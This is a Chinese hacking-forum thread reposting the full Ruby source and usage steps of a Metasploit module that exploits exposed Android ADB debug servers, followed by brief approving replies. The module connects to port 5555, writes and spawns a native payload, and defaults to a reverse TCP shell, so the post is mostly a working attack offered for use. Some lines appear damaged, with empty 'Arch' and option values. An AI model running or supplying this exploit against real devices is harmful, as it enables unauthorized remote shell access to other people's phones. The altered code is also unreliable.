90_ 发表于 2016-1-25 15:15:44

Android ADB Debug Server Remote Payload Execution Exploit

Usage info:
msf > use exploit/android/adb/adb_server_exec
msf exploit(adb_server_exec) > show targets
...targets...
msf exploit(adb_server_exec) > set TARGET <target-id>
msf exploit(adb_server_exec) > show options
...show and set options...
msf exploit(adb_server_exec) > exploit

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
require 'rex/proto/adb'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Android ADB Debug Server Remote Payload Execution',
      'Description'    => %q{
        Writes and spawns a native payload on an android device that is listening
        for adb debug messages.
      },
      'Author'         => ['joev'],
      'License'        => MSF_LICENSE,
      'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/shell_reverse_tcp' },
      'Platform'       => 'linux',
      'Arch'           => ,
      'Targets'        => [
        ['armle',  {'Arch' => ARCH_ARMLE}],
        ['x86',    {'Arch' => ARCH_X86}],
        ['x64',    {'Arch' => ARCH_X86_64}],
        ['mipsle', {'Arch' => ARCH_MIPSLE}]
      ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jan 01 2016'
    ))
 
    register_options([
      Opt::RPORT(5555),
      OptString.new('WritableDir', )
    ], self.class)
  end
 
  def check
    setup_adb_connection do
      device_info = @adb_client.connect.data
      print_good "Detected device:\n#{device_info}"
      return Exploit::CheckCode::Vulnerable
    end
 
    Exploit::CheckCode::Unknown
  end
 
  def execute_command(cmd, opts)
    response = @adb_client.exec_cmd(cmd)
    print_good "Command executed, response:\n #{response}"
  end
 
  def exploit
    setup_adb_connection do
      device_data = @adb_client.connect
      print_good "Connected to device:\n#{device_data.data}"
      execute_cmdstager({
        flavor: :echo,
        enc_format: :octal,
        prefix: '\\\\0',
        temp: datastore['WritableDir'],
        linemax: Rex::Proto::ADB::Message::Connect::DEFAULT_MAXDATA-8,
        background: true,
        nodelete: true
      })
    end
  end
 
  def setup_adb_connection(&blk)
    begin
      print_status "Connecting to device..."
      connect
      @adb_client = Rex::Proto::ADB::Client.new(sock)
      blk.call
    ensure
      disconnect
    end
  end
 
end

菜鸟小羽 发表于 2016-1-27 01:09:02

还是不错的哦,顶了

r00tc4 发表于 2016-1-27 01:46:27

还是不错的哦,顶了

54hacker 发表于 2016-1-27 06:10:52

支持中国红客联盟(ihonker.org)

小路 发表于 2016-1-27 07:46:48

支持中国红客联盟(ihonker.org)

08-wh 发表于 2016-1-27 11:27:44

还是不错的哦,顶了

HUC-凤凰 发表于 2016-1-27 21:49:53

.看不懂,写的是什么?_?

CHRIS 发表于 2016-1-28 08:10:57

支持,看起来不错呢!

cl476874045 发表于 2016-1-28 20:47:06

学习学习技术,加油!

borall 发表于 2016-1-28 23:40:34

页: [1]
查看完整版本: Android ADB Debug Server Remote Payload Execution Exploit